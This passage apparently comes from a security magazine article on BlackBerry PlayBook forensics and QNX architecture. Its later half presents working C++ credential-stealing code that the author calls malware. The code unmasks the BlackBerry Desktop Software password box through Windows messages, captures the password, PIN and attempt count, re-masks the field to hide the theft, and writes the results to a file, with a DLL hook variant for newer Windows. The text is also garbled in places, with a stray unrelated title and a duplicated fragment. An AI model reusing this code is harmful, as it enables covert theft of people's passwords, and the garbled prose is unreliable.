This approach mainly based on examines how many differences do exist between BlackBerry OS and new BlackBerry OS based on QNX OS. It highlights whether one techniques provide more easy implementation, investigation and handling or not, what common differences examiners may encounter and what they should as concept be involved to forensic handling with these platforms because a Playbook OS is completely a new approach.
http://hakin9.org/dont-be-mocked-secure-your-system-0512-2/
Artificial intelligence in the post-deep learning era
Secure Your System with Mobile Forensics
1.
2. Don’t Be Mocked Secure Your System
1 / 108
Chapter 1
BlackBerry Playbook – New Challenges
Say your client is charged with trade secret theft. What if you could show electronic evidence that, at the time of the theft,
your client was in thousand miles away from the crime scene? Or driving down the freeway, talking on his mobile phone?
Or sending mundane text messages to his spouse? Or taking photos at the beach? If this sounds appealing, you need to
learn about mobile device forensics.
What you will learn. . .
• What’s new on BlackBerry Playbook Forensics area
• How many differences are between BlackBerry Smartphone and Tablet forensics techniques
What you should know. . .
• Basic knowledge about Forensics (Classic and Live)
• Basic knowledge about BlackBerry Forensics
• Basic knowledge about BlackBerry PlayBook
Mobile phone proliferation in our societies is on the increase. Advances in semiconductor technologies related to mobile phones
and the increase of computing power of mobile phones led to an increase of functionality of mobile phones while keeping the
size of such devices small enough to fit in a pocket. This led mobile phones to become portable data carriers. This in turn
increased the potential for data stored on mobile phone handsets to be used as evidence in civil or criminal cases. Mobile
devices – cell phones, BlackBerrys, Androids, iPads – are everywhere. People use them to take photographs, send texts and
emails, update Facebook, consult maps, search the web – the list goes on. As they do this, however, their mobile devices
often are quietly making records and generating evidence of those activities. For better or for worse, this makes mobile devices
perhaps the richest source of evidence about the people that use them. At present, the BlackBerry holds the palm of insufficient
security examination despite of existing approaches more than Android (because Android/iOS/Windows was not developed in
consideration of secure even) but all security techniques implemented in these mobile devices are indecisive argument on security.
It means its argument to forensics. All security agencies are facing with dealing with mobiles forensics repeatedly. Forensics
tools may give incredible opportunity to gain all kind of data but there are too many slight objections. Until companies go in only
one of ways - classic forensics or live monitoring (DLP or else) - it fails, because forensics field need more effective synthesis of
mechanism.ed to highlight whether one techniques provide more easy implementation, investigation and handling or not, what
common differences examiners may encounter and what they should as concept be involved to forensic handling with these
platforms because a Playbook OS is completely a new approach.
3. Don’t Be Mocked Secure Your System
2 / 108
Mobile Forensics
As mobile phones become so ubiquitous and play such large societal role there is a high probability that these same devices will
be part of those investigations. A mobile phone can be tied to crime in four ways:
• as a communication tool in the process of committing a crime.
• as a storage device providing evidence of a crime.
• as a storage device that contains victim information.
• It can be a means of committing a crime
Mobile devices can communicate constantly, a very real concern exists that the data you are interested in (especially email, texts,
and internet records) could be crowded out by newly arriving data and disappear if the device is not rendered incommunicative.
This could be as simple as turning the device off, but you should be aware the loss of data in RAM memory or activation of
password protections. The same effect could happen if the device’s batteries run out.
Nowadays mobile devices provide amount of features to integrate all possible communications following aggregation with data
on BlackBerry as well as Android. The native and third party applications often connect to the email, maps IM messenger
and social statutes. They keep users connected and do far more. The logical acquisition manages with known data types
for any user and this data set rarely differs among of iOS, Android or BlackBerry. As mentioned above these data contain
messages (SMS/MMS/Email/IM), social network data, contacts, calendar, phone logs, password and bank wallet and other
financial application data, media data (Audio/Photos/Videos) and other data even file structure, browser data (web history as
a timeline and bookmarks), and shared folders. The BlackBerry apps environment is known is wide-bind and amazing than
Android. On another hand, Android has enough not only third-party applications that is very different but also a hundreds
variations depend on manufacturer. As opposed to the BlackBerry Smartphone, the BlackBerry PlayBook is on QNX OS offers
implemented modern technologies take away from real development. All above brings in the zoo-world of mobile phones and
highlights issues of misusing security techniques in development area. New special skills that forensics experts required rarely
based on experience only.
Each year the classic forensics techniques face on a huge problem while live forensics (or live monitoring) gives new opportunities
to manipulate with data. Sometimes, company IT Policy or OS vision may be helpful to be sure that no triggers will break
investigation. Physical approach is trust but nonoperability, while logical is more dangerous because of synchronization process
via network, cellular, and OTA. There are too many cases when it cannot afford not to use prevent methods or tools to simplify
the classic forensics. This article describes technical problems encountered by forensics as well as different live solutions maybe
useful and those became "right" way with vendors’ development.
Playbook Architecture
We have already known that QNX-based OS is background for BlackBerry 10 (that replaces old BlackBerry OS after version 7)
and BlackBerry Tablet. BlackBerry Tablet OS based on the QNX Neutrino real-time OS featured by running Adobe AIR and
WebWorks applications as well as Android applications written in Java instead of BlackBerry Java applications (smartphones
apps). Below are main features that available on the Playbook
• BlackBerry Bridge – the ability to connect to, and access data on, a BlackBerry smartphone using internet.
– Document editing through BlackBerry Bridge
– BlackBerry Messenger, Push email, contacts, calendar, etc. via BlackBerry Bridge
• Video chat capability with other BlackBerry PlayBook users
• Adobe Flash and Adobe AIR
• ZIP Attachment Support
• Application created using NDK
4. Don’t Be Mocked Secure Your System
3 / 108
• Support for Android 2.3 apps
• Documents To Go and Print To Go
• Native Email, Calendar, Contacts app
• File Manager
• Social network integration with Facebook, Twitter, LinkedIn
• Full device encryption
• Screenshots saved in lossless PNG format.
Figure 1.1: BlackBerry Playbook
The BlackBerry Tablet OS is a microkernel OS implements the minimum amount of software in the kernel space and run other
processes in the user space outside of the kernel space. By running most processes in the user space, the BlackBerry Tablet
OS can manage unresponsive processes in isolation from others. This helps prevent damage to the operating system and other
applications.
The primary goal of QNX Neutrino is to deliver the open systems POSIX API in a scalable form suitable for a wide range of
systems—from tiny, resource-constrained embedded systems to high-end distributed computing environments that is fundamental
for mission-critical applications. QNX Neutrino is ideal for embedded real-time applications. It can be scaled to very small
sizes and provides multitasking, threads, priority-driven scheduling, and fast context-switching—all essential ingredients of an
embedded real-time system. Any thread on any machine in the network can directly make use of any resource on any other
machine. From the application’s perspective, there is no difference between a local or remote resource—no special facilities
need to be built into applications to allow them to make use of remote resources. Users may access files anywhere on the
network, take advantage of any peripheral device, and run applications on any machine on the network (provided they have the
appropriate authority). Processes can communicate in the same manner anywhere throughout the entire network. Thus, the QNX
Neutrino microkernel has kernel calls to support the following:
5. Don’t Be Mocked Secure Your System
4 / 108
• threads
• message passing
• signals
• clocks
• timers
• interrupt handlers
• semaphores
• mutexes
• condition variables
• barriers
The key advantage gained by adding memory protection to embedded applications, especially for mission-critical systems, is
improved robustness. With memory protection, if one of the processes executing in a multitasking environment attempts to
access memory that hasn’t been explicitly declared or allocated for the type of access attempted, the MMU hardware can notify
the OS, which can then abort the thread (at the failing/offending instruction). This protects process address spaces from each
other, preventing coding errors in a thread in one process from damaging memory used by threads in other processes or even in
the OS. During development, common coding errors (e.g. stray pointers and indexing beyond array bounds) can result in one
process/thread accidentally overwriting the data space of another process. If the overwriting touches memory that isn’t referenced
again until much later, you can spend hours of debugging—often using in-circuit emulators and logic analysers—in an attempt
to find the guilty party.
The microkernel architecture of the BlackBerry Tablet OS supports the following features:
• designed to be tamper resistant means if the kernel integrity test reveals damage to the kernel, the BlackBerry Tablet OS does
not start.
• designed to be resilient means restarting any process without negatively affecting others because of separation user and kernel
space.
• designed to be highly secure throughout validation requests for system resources like access to the camera via displaying a
dialog box to grant or refuse access to that capability.
• designed to verify the authenticity of an application means to be signed by the RIM Signing Authority with developer certificate.
Going further to details and uncover QNX architecture.
File systems
QNX Neutrino provides a rich variety of file systems. Like most service-providing processes in the OS, these file systems execute
outside the kernel; applications use them by communicating via messages via POSIX API open() , close() , read() , write() , lseek()
, etc. and checking for permissions and access authorizations. When a pathname is resolved, the process manager contacts all
the file-system resource managers that can handle some component of that path. The result is a collection of file descriptors that
can resolve the pathname. If the pathname represents a directory, the process manager asks all the file systems that can resolve
the pathname for a listing of files in that directory when readdir() is called else resolves the pathname is accessed.
File systems categorized into the following classes:
• Block that operates on block devices like hard disks and CD-ROM drives
• Network that provides network file access to the file systems on remote host computers.
6. Don’t Be Mocked Secure Your System
5 / 108
Every QNX system also provides a simple RAM-based file system that allows read/write files to be placed under /dev/shmem that
is not actually a file system and used in tiny embedded systems where persistent storage across reboots is not required, yet where
a small, fast, temporary-storage file system with limited features is called for. The RAM file system does not support hard or
soft links or directories but possible to create a link to it by using process-manager links, e.g. create a link to a RAM-based /tmp
directory: ln -sP /dev/shmem /tmp following "procnto" to create a process manager link to /dev/shmem known as /tmp.
According to minimizing the size of the RAM file system code inside the process manager, this file system does not include file
locking or directory creation features.
The Network File System (NFS) allows a client workstation to perform transparent file access over a network, operate on server
files across a variety of OS. NFS operates by using remote procedure calls (RPC) and TCP/IP for its transport.
All these implementations means that:
• file systems may be started and stopped dynamically.
• multiple file systems may run concurrently.
• applications are presented with a single unified pathname space and interface, regardless of the configuration and number of
underlying file systems.
• a file system running on one node is transparently accessible from any other node.
Networking Architecture
The networking services execute outside the kernel too and allow:
• network drivers to be started and stopped dynamically
• protocols to run together in any combination
The network subsystem relies on network manager (io-pkt-v4, io-pkt-v4-hc, or io-pkt-v6-hc). On bottom are drivers provided
the passing data to and receiving data from the hardware. The drivers hook into a multi-threaded layer-2 component (that
also provides fast forwarding and bridging capability) that ties them together and provides a unified interface for directing
packets into the protocol-processing components of the stack. This includes, for example, handling individual IP and upper-layer
protocols such as TCP and UDP. The resource manager is on top of the stack and looks like inter-level between the stack and user
applications where developers find a well-known interface i.e. open(), read(), write(), and ioctl(). A detailed view of the io-pkt
architecture is on picture 2.
7. Don’t Be Mocked Secure Your System
6 / 108
Figure 1.2: Network architecture
At the driver layer, there are interfaces for Ethernet traffic and for 802.11 management frames from wireless drivers. Here is
hardware crypto API that allows the stack to use a crypto offload engine when it’s encrypting or decrypting data for secure links.
In addition to drivers and protocols, the stack also includes hooks for packet filtering:
• Berkeley Packet Filter (BPF) interface. A socket-level interface that lets you read and write, but not modify or block, packets,
and that you access by using a socket interface at the application layer (see http://en.wikipedia.org/wiki/Berkeley_Packet_Filter).
This is the interface of choice for basic, raw packet interception and transmission and gives applications outside of the stack
process domain access to raw data streams.
• Packet Filter (PF) interface. A read/write/modify/block interface that gives complete control over which packets are received
by or transmitted from the upper layers and is more closely related to the io-net filter API
IP used for everything from simple tasks e.g. remote login to more complicated tasks e.g. delivering real-time stock quotes.
QNX provides the following stack configurations:
• NetBSD TCP/IP stack supports forwarding, broadcast and multicast, hardware checksum support, routing sockets, Unix do-
main sockets, multilink PPP, PPPoE, supernetting (CIDR), NAT/IP filtering, ARP, ICMP, and IGMP, as well as CIFS, DHCP,
AutoIP, DNS, NFS (v2 and v3 server/client), NTP, RIP, RIPv2, and an embedded web server
• Enhanced NetBSD stack with IPsec and IPv6 includes previous but targeted at the new generation of mobile and secure
communications - IPv6 and IPsec mainly for VPNs over IPsec tunnels
IKE (ISAKMP/Oakley) key management protocol for establishing secure host associations.
The BSD Socket API was the obvious choice for QNX Neutrino that is a standard API for in the UNIX world like Winsock API
in Windows. All the routines that application programmers including well known: accept(), bind(), bindresvport(), connect(),
dn_comp(), dn_expand(), endprotoent(), endservent(), gethostbyaddr(), gethostbyname(), getpeername(), getprotobyname(),
getprotobynumber(), getprotoent(), getservbyname(), getservent(), getsockname(), getsockopt(), herror(), hstrerror(), htonl(),
htons(), h_errlist(), h_errno(), h_nerr(), inet_addr(), inet_aton(), inet_lnaof(), inet_makeaddr(), inet_netof(), inet_network(),
inet_ntoa(), ioctl(), listen(), ntohl(), ntohs(), recv(), recvfrom(), res_init(), res_mkquery(), res_query(), res_querydomain(),
res_search(), res_send(), select(), send(), sendto(), setprotoent(), setservent(), setsockopt(), shutdown(), socket().
BlackBerry Playbook provides a NAT that includes such features as:
8. Don’t Be Mocked Secure Your System
7 / 108
• rule grouping: to apply different groups of rules to different packets
• stateful filtering: an optional configuration to allow packets related to an already authorized connection to bypass the filter
rules
• NAT—for mapping several internal addresses into a public (Internet) address, allowing several internal systems to share a
single Internet IP address.
• proxy services: to allow ftp, NetBIOS, and H.323 to use NAT
• port redirection: for redirecting incoming traffic to an internal server or to a pool of servers.
User Interface
The presence of the Shared Task Model and its use as a communication medium between the user and the Tablet recognition
system affords the potential to create a wide variety of different user interfaces, each customized for different usage environments
and manipulation capabilities.
Playbook benefits are in it designed to provide the flexibility that comes from providing an intelligent supervisor and intelli-
gent subordinates the ability to collaborate flexibly about the precise task and method that the subordinate is to perform. This
interaction style will provide multiple benefits for the human and machine collaboration, including:
• Increased user satisfaction and acceptance
• Decreased human skill loss
• More balanced workload
• More accurate and balanced automation reliance decisions
• Increased situation awareness (relative to a more fully automated or autonomously adaptive automation approach)
• Improved human and machine system performance (especially in flexible and unpredictable domains which offer enough time
for human awareness and planning)
Forensics techniques
There are many different ways to analyze forensically a mobile device:
• Physical acquisition technique is a bit-by-bit copy of an entire physical stories, doing a full physical copy (i.e., all the bits
in memory, not just the files) of the entire memory store on the device. This method, which can be very difficult to perform
properly, allows deleted files and any data remnants present (i.e., in unallocated memory or file system space) to be examined,
which otherwise would go unfound
• Logical acquisition technique is a bit-by-bit copy of logical storage objects (e.g., directories and files). It has the advantage of
simplifying for a tool to extract and organize but does not produce any deleted information except database file cases which
does not overwrite the information but simply marks it as deleted and available for later overwriting.
• Using commercially available forensic software tools (as extend previous) which, as time passes, are becoming increasingly
more capable and sophisticated. This software generally makes a full copy of all the files on the device (i.e., a "logical" copy),
which can result in a capture of most user-created data, and even some deleted data.
• Manual acquisition technique is user interface utilizing to get pictures of data from the screen, simply manipulating the phone
(by navigating through the email, photographs, or contacts list, for example) while videotaping and/or photographing the
results. While this may be sufficient for some cases, obvious disadvantages include the fact that it involves manipulating and
changing the very evidence you are seeking to preserve. The disadvantage is that only data visible to the operating system can
be recovered and that all data are only available in form of pictures.
• Backup - This technique is relatively easy, and it allows a significant amount of user-created data (photographs, songs, and
emails, texts) to be preserved. Care must be taken, however, to modify the settings so that data from the "synced" computer does
not overwrite the data on the device. Like previous, it also involves some manipulation, and thus alteration, of the evidence.
9. Don’t Be Mocked Secure Your System
8 / 108
BlackBerry Playbook Challenges
A BlackBerry is a handheld mobile device engineered for email. All models now come with a built-in mobile phone, making
the BlackBerry an obvious choice for users with the need to access their email from somewhere besides the comfort of a desk
chair. The BlackBerry device is always on and participating in some form of wireless push technology. Because of this, the
BlackBerry does not require some form of desktop synchronization like the other mobile device does. BlackBerry Playbook is
an add-on for BlackBerry smartphone only, because BlackBerry Bridge accesses mail, calendaring and contacts directly from a
tethered BlackBerry phone, the PlayBook meets the same encryption standards as the BlackBerry phone. It is the first (and as
of September 2011, the only) tablet device to receive FIPS 140-2 certification, which makes it eligible for use by U.S. federal
government agencies. In addition, the Australian government also approved the use of PlayBook as the only tablet that meets
its security standard. Playbook does not have neither push technology for email/calendar/else, only IMAP4 and POP3 except
MS Exchange link nor BIS except BlackBerry Mobile Fusion that did not replace BES but one more add-on to manage non-
blackberry smartphone devices and BES existed in company. In addition, email and social accounts will broke and ask you
reenter your password that may help to discard pushing data.
Figure 1.3: Broken Mail
Network Isolation
One of the main ongoing considerations for analysts is preventing the device from any network changes that is sometimes
achievable for PlayBook where there is no cellular connection, but only a network connection. As mentioned early it might bring
in new data. However, any interaction with the devices like plugging and unplugging the device will modify them. The first
idea is dismounting encryption or preventing of blocking to examine the device while it is running. PlayBook as another else
device is difficult to analyze forensically without negative affecting because of storage cannot be easily removed, storage is only
internal and there no external storage like SD-card as it is for BlackBerry smartphone. The worst case in forensics is remote
wiping initiated or data added/overwritten outside control from any triggers often SMS or incoming call is impossible through
BlackBerry Bridge even: SMS for BlackBerry Bridge simply didn’t developed and incoming call notification cannot be caught
as well as all Bridge’s events throughout API. Nevertheless, forensics experts still have to prevent a connection. A powerful way
"airplane mode" (or the same named in different way) helps. Android problem to stop network communications is awful GUI
and forensics officer should press and hold the Power off button and select Airplane mode at first (if this hotkey will work) or
then press Menu (from the home screen), Settings, finally, the Wireless option which is generally near the top. It’s only to disable
cellular network while to block wireless connection like Bluetooth or Wi-Fi he have to walk out home screen to the settings that
10. Don’t Be Mocked Secure Your System
9 / 108
have upset because time is counting and no one can be sure if setting GUI is the same among devices. BlackBerry allows do it
very quickly by clicking on tray on home screen.
BlackBerry Push-Technology for Playbook
BlackBerry (smartphone) was primary engineered for email and come with a built-in mobile phone providing access to the
email from anywhere. It is always on and participating in wireless push-technology and does not require any kind of desktop
synchronization like the others. The first step is turn the radio off, or a better solution is to take the device to an in area where
the signal cannot be received, as the BlackBerry device is not really "off" unless power is removed for an extended period. If the
blackberry powered back off then any items that were in the queue waiting to be pushed to the device could possibly be pushed
before you could stop them.
The BlackBerry PlayBook is an add-on for BlackBerry smartphone only, because BlackBerry Bridge accesses mail, calendaring
and contacts directly from a tethered BlackBerry phone. Since the Playbook is not all always on there is rarely types of informa-
tion pushed to it following overwriting or deletion. The PlayBook does not have neither push technology for email/calendar/else
(only IMAP4 and POP3 except MS Exchange link) nor BIS except BlackBerry Mobile Fusion that managed non-blackberry
smartphone devices and BES existed in company. In addition, email and social accounts may broke and ask user reenter his
password that may help to discard pushing data. It means the PlayBook is not all always on there is rarely types of information
pushed to it following overwriting or deletion. As opposed to smartphone, Playbook was made filled by stand-alone applica-
tions that mighty use internet connect in standby mode or when applications swiped down; by default, Playbook has option to
restrict activity in this state. The Playbook address book application is filled Facebook, Twitter and LinkedIn connections, but
synchronizing has never happened before you run application and wait until it is done. Sometimes it takes 1 minute even or more.
Password Protection
BlackBerry devices come with password protection and attempt limit (by defaults - five out ten, min - three out ten; a PlayBook
case may differ from five to ten where "ten" is often for PlayBook device and "five" is for BlackBerry Desktop Software and
plugged PlayBook). If it is exceed, device will wipe then (factory resetting). All data stored on external memory will keep
because that’s not part of the factory configuration if talking about smartphone not PlayBook, which has not external storage. So
it will not reformat the micro SD card but if you have a BlackBerry Playbook, you will get factory defaults at all.
Password Extraction/Bypassing
Brute-force
Accessing encrypted information stored in password-protected backups it possible via Elcomsoft products that offer to restore
the original password of backup and device. The toolkit allows eligible customers acquiring bit-to-bit images of devices’ file
systems, extracting phone secrets (passcodes, passwords, and encryption keys) and decrypting the file system dump. It also reads
BlackBerry Wallet data and Password Keeper data. The recovery of BlackBerry password is possible only if the user-selectable
Device Password security option enabled to encrypt media card data. As the Playbook poor for native application, you could find
databases with password in shared folders put by third-party applications.
Live methods
Techniques discussed in my articles (mainly summarized in "To get round to the heart of fortress", "When Developer’s API
Simplify User-Mode Rootkits Developing", "When Developers API Simplify User-Mode Rootkits Development - Part II") are
still effective and very useful. These techniques are:
• default feature to show password without asterisks that’s a possible to screen-capture. If "screenshot" API isn’t disable it works
(by defaults it’s allowed)
11. Don’t Be Mocked Secure Your System
10 / 108
• scaled preview for typed character through virtual keyboard. It works too and maybe screenshoted. As further consideration
agent may XOR two screenshots and extract preview of pressed key as well as typed text.
• stealing password during synchronization from BlackBerry Desktop Software. It works because of security issues of Windows
API. Moreover, it works not only to grab device password but backup password too.
• redrawing fake-window to catch typed password on device. Some social engineering aspect to announce "something is crashed
and lock the device, please unlock by re-entering a password". The last techniques (stealing) work on PlayBook as well.
I will remind how to extract password from BlackBerry Desktop Software in real-time. Every device is going to synchronize
with PC sometimes. Pass over a Mac and move to Windows. Windows XP and Windows Vista (just in case), Windows 7 make
our first target group (most popular). BlackBerry Device Manager (as known in version 4.xx or 5.xx) and BlackBerry Desktop
Manager make second target group (if we are talking about version 6.xx). It is a minor target than major target is password field
of textbox’s software. Unfortunately, we cannot get a screen-capture. So, try to use a WINAPI functional.
First, we need recall a knowledge about system messages and system object. What does edit box look like? It’s simple field
for typing character ~32k in length that has a "password char" property. It has default #0 value or NULL or 0’. Other masking
character could be a black circle, asterisk, or anything else. 0x25CF is Unicode character of black circle. Every system object
like modal window or textbox responds to API subroutine such as "SendMessage" or "PostMessage". Both subroutines send the
specified message to a window or windows. However, if you need to post a message in the message queue associated with a
thread you should use the "PostMessage" function. Parameters’ syntax is the same. First parameter is (Type: HWND) a handle
to the window whose window procedure will receive the message. If this parameter is HWND_BROADCAST ((HWND)0xffff),
the message is sent to all top-level windows in the system, including disabled or invisible windows, overlapped windows, and
pop-up windows; but the message is not sent to child windows. Second parameter is (Type: UINT) a message to be sent. For lists
of the system-provided messages, see System-Defined Messages. Other two parameters (Type: WPARAM, Type: LPARAM) are
represent an additional message-specific information. It is easy to guess that we need in WM_GETTEXT (0x000D) message. It
copies the text that corresponds to a window into a buffer provided by the caller. Window’s caption or "text field’s" content could
copy with it. However, if "edit box" is masked you cannot copy text, because you get a NULL-pointer. Well then, do unmask
copy and mask again (Figure 7).
Back in 2003 when MS Windows "PostMessage" API Unmasked Password Weakness was found. Declared affects:
• Microsoft Windows 2000 Advanced Server
• Microsoft Windows 2000 Datacenter Server
• Microsoft Windows 2000 Professional
• Microsoft Windows 2000 Server
• Microsoft Windows XP Home Edition
• Microsoft Windows XP Professional
A weakness has been reported in the Microsoft Windows "PostMessage" API, which could effectively allow unmasked passwords
to be copied into a user’s clipboard or other buffer. "PostMessage" places a message in the message queue but does not sufficiently
check the message type. EM_SETPASSWORDCHAR (Type UINT, Message) messages set the password mask character in
password edit box controls. "PostMessage" abused in combination with EM_SETPASSWORDCHAR messages to cause an
unmasked password placed into a buffer that could be accessed potentially through other means by an unauthorized process.
Exploitation would require a malicious local process to wait for an authentication prompt sent to the local user by another
application. The attacker would then have to authenticate normally. The unmasked password will copy while this is occurring.
From this point, a further attack would be required to steal password credentials. Before, use this WINAPI function you should
know handler of recipient object. Should to find a window’s handler a then an object’s handler. To do it either download
desirable software or other use "WindowFromPoint(Mouse→CursorPos)" that return a handler of what under your mouse cursor’s
coordinates. I would prefer a first way.
At first, let us check it with old BlackBerry Manager (version 4 or 5).
12. Don’t Be Mocked Secure Your System
11 / 108
Figure 1.4: Class name & Window Text of controls (v4-v5) - part I
Figure 1.5: Class name & Window Text of controls (v4-v5) - part II
13. Don’t Be Mocked Secure Your System
12 / 108
Figure 1.6: Class name & Window Text of controls (v4-v5) - part III
Figure 1.7: Class name & Window Text of controls (v4-v5) - part IV
Thus, we have a "ClassName" of password’s window "#32770" and language-sensitive caption "Device Password Required".
Also, device pin and attempt’s counter are in our disposal.
A "FindWindow" function retrieves a handle to the top-level window whose class name and window name match the specified
strings. Its return us a window’s handler. To access to the static and edit controls use the function searches child windows,
14. Don’t Be Mocked Secure Your System
13 / 108
beginning with the one following the specified child window. It is known as "FindWindowEx". Full usage description you find
on MSDN (see the Listing 1).
Listing 1. Catch password dialog’s handler (first part)
void __fastcall Catcher()
{
//ClassName of Window
char *internal = "#32770";
//Caption of Window
char *external = "Device Password Required";
//Catch a Window
HWND window = FindWindow(internal, external);
...
}
But we don’t know what text we’re got in cause having 2 or 3 static name (depend on v4-v5 and v6). Z-order and "GetWindow"
function is come to aid. The z-order of a window indicates the window’s position in a stack of overlapping windows. This
window stack is oriented along an imaginary axis, the z-axis, extending outward from the screen. The window at the top of
the z-order overlaps all other windows. The window at the bottom of the z-order is overlapped by all other windows. Function
retrieves a handle to a window that has the specified relationship (Z-Order or owner) to the specified window. Two parameters
should be used is in "GetWindow" Constant. Note that in BlackBerry Manager v4 (or v5) is one static for password’s attempts
and device pin than in BlackBerry Desktop Manager v6 where it two separate controls (see the Listing 2).
GetWindow Constant
• GW_HWNDNEXT (0x0002) Identifies the window below the specified window in the Z order.
• GW_HWNDPREV (0x0003) Identifies the window above the specified window in the Z order.
Listing 2. Retrieve a static text from password dialog (second part)
void __fastcall Catcher()
{
...
if ((bool)(int)window)
{
//Label like "Password:"
char *stat_pass_text = (char *)malloc(256);
//Label like "PIN of Device:"
char *stat_devc_text = (char *)malloc(256);
//Label like "Your attempt counts:"
char *stat_attmp_text = (char *)malloc(256);
//In Z-order first of all get a password-static control
HWND stat_pass = FindWindowEx(window, NULL, "Static", "Password:");
//In Z-order previous of it is attemp’s count
HWND stat_attmp = GetWindow(stat_pass, 3);
//In Z-order next of it is Device PIN
HWND stat_devc = GetWindow(stat_pass, 2);
//get control’s caption for a password-static control
GetWindowText(stat_pass, stat_pass_text, 256);
//get control’s caption for a pin-static control
GetWindowText(stat_attmp, stat_attmp_text, 256);
//get control’s caption for a attemp_count-static control
GetWindowText(stat_devc, stat_devc_text, 256);
AnsiString DEV_PIN = AnsiString(stat_devc_text);
AnsiString ATTEMPT = AnsiString(stat_attmp_text);
15. Don’t Be Mocked Secure Your System
14 / 108
//correct a program version:
//if NULL then BlackBerry Manager v4 or BlackBerry Manager v5
//else everythin ’s OK - BlackBerry Desktop Manager v6
if (DEV_PIN.Length() < 1)
{
int pos = AnsiPos("n", AnsiString(ATTEMPT.c_str()));
//extract a first part of Static (PIN)
DEV_PIN = ATTEMPT.SubString(1, pos - 1);
//extract a second part of Static (attempt’ count)
AnsiString ATTEMPT = ATTEMPT.SubString(pos + 1, ATTEMPT.Length() - ←
pos);
}
free(stat_devc_text);
free(stat_attmp_text);
free(stat_pass_text);
...
}
...
}
After it copied, get an edit’s handler and send via "PostMessage" function with EM_SETPASSWORDCHAR message and
NULL-parameters (WPARAM & LPARAM) to that handler. Via "SendMessage" function with WM_GETTEXT and buffer &
buffer-size parameters retrieved characters from edit-box. Moreover, do not forget about masking typed chars via "SendMes-
sageW" functional with EM_SETPASSWORDCHAR message and 0x25cf WPARAM. It strongly recommend using Unicode
version of "SendMessage", else you’ve got another character than black circle (see the Listing 3).
Listing 3. Catch password from a password dialog (third part)
void __fastcall Catcher()
{
...
if ((bool)(int)window)
{
...
Application->ProcessMessages();
//get handler of EditBox
HWND pass_hwnd = FindWindowEx(window, NULL, "Edit", NULL);
//Check desirable EditBox (with Parent Form’s Caption "Device Password ←
Requied")
if ((bool)(int)pass_hwnd)
{
//unset password masking
PostMessage(pass_hwnd, EM_SETPASSWORDCHAR, 0, 0);
//ReDraw EditBox
//InvalidateRect(pass_hwnd, 0, true);
//allocate memory for edit’s password
char *passw = (char *)malloc(256);
//Password’s borrowing
SendMessage(pass_hwnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw);
//store in new variable
AnsiString password = AnsiString(passw);
free(passw);
//Don’t let him (user) see it. Paint out.
//0x25CF is unicode character of black circle
//(dialog boxes on Win7, XP).
SendMessageW(pass_hwnd, EM_SETPASSWORDCHAR, 0x25cf, 0);
16. Don’t Be Mocked Secure Your System
15 / 108
//ReDraw EditBox
//InvalidateRect(pass_hwnd, 0, true);
//If action is unsuccessfull set "EMPTY" info
if (password.Length() == 0)
{
password = "EMPTY";
}
if (DEV_PIN.Length() == 0)
{
DEV_PIN = "EMPTY";
}
if (ATTEMPT.Length() == 0)
{
ATTEMPT = "EMPTY";
}
//Store in StringList variable our PIN, attemps count and pass
in_list->Add(DEV_PIN);
in_list->Add(ATTEMPT);
in_list->Add(password );
Application->ProcessMessages();
try
{
in_list->SaveToFile("c:pass.txt");
}
catch (Exception *ex)
{
}
}
}
}
Look at figures 8. A malware’s code has caught a password, device pin, attempt counter. To prove password’s correctness I
comment "SendMessageW(..,0x25cf,..)" line to represent a password without masking (figure 9).
Figure 1.8: Stolen password (v4)- part I
17. Don’t Be Mocked Secure Your System
16 / 108
Figure 1.9: Stolen password (v4)- part II
If we try to use this code in Vista or Seven we get nothing, because it is more correct to set system hook is owner address space
via loading a DLL-Cather. However, at this rate you should to know OS version, right? Roughly, we need a so-called Major
Version to distinct XP and 7 (see the Listing 4).
Listing 4. Get OS version
bool xp_seven = false; //indicate XP OS or Seven OS
void __fastcall get_os()
{
vinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&vinfo);
if (vinfo.dwMajorVersion == 4)
{
this->Edit5->Text = "Windows NT 4.0, Windows Me, Windows 98, or Windows 95" ←
;
}
else if (vinfo.dwMajorVersion == 5)
{
this->Edit5->Text = "Windows Server 2003 R2, Windows Server 2003, Windows ←
XP, or Windows 2000";
xp_seven = false;
}
else if (vinfo.dwMajorVersion == 6)
{
this->Edit5->Text = "Windows Vista, Windows Server Longhorn or Windows ←
Seven";
xp_seven = true;
}
...
}
Now, let us check with class names and window texts against BlackBerry Desktop Manager (figures 10-13). Most of this repeats
previous parts exclude several ideas. How to use system hooks you can find on google.com, so I mark several ideas. SysMsg-
Proc(int code, WPARAM wParam, LPARAM lParam) returns to us parameter (LPARAM) Wnd = ((tagMSG*)lParam)→hwnd
where stored out handler for controls. Then we need to catch again a password dialog and retrieve a edit’s handler. After
successful comparing both handlers you is able to steal password. Note, in this case (dll) you should redraw a control by
invalidate-function (see the Listing 5-6).
18. Don’t Be Mocked Secure Your System
17 / 108
Figure 1.10: Class name & Window Text of controls (v6) - part I
Figure 1.11: Class name & Window Text of controls (v6) - part II
19. Don’t Be Mocked Secure Your System
18 / 108
Figure 1.12: Class name & Window Text of controls (v6) - part III
Figure 1.13: Class name & Window Text of controls (v6) - part IV
20. Don’t Be Mocked Secure Your System
19 / 108
Listing 5. Main definitions
void __fastcall TForm1::FormCreate(TObject *Sender)
{
if (FileExists("c:pass.txt"))
{
DeleteFile("c:pass.txt");
}
//get os version
vinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&vinfo);
if (vinfo.dwMajorVersion == 4)
{
this->Edit5->Text = "Windows NT 4.0, Windows Me, Windows 98, or Windows 95" ←
;
}
else if (vinfo.dwMajorVersion == 5)
{
this->Edit5->Text = "Windows Server 2003 R2, Windows Server 2003, Windows ←
XP, or Windows 2000";
xp_seven = false;
}
else if (vinfo.dwMajorVersion == 6)
{
this->Edit5->Text = "Windows Vista, Windows Server Longhorn or Windows ←
Seven";
xp_seven = true;
}
if (xp_seven)
{
// Load the DLL file
hModule = LoadLibrary("Catcher.dll");
// Get the address of the function
RunStopHook = (void *(__stdcall *)(bool, HINSTANCE))GetProcAddress(hModule, ←
"_RunStopHook");
//Start Catcher
RunStopHook(true, hModule);
}
else
{
this->CatchTimer->Enabled = true;
}
}
//---------------------------------------------------------------------------
void __fastcall TForm1::FormDestroy(TObject *Sender)
{
if (normally_closed)
{
return;
}
if (xp_seven)
{
if (RunStopHook != NULL)
{
RunStopHook(false, hModule);
}
if (hModule != NULL)
{
21. Don’t Be Mocked Secure Your System
20 / 108
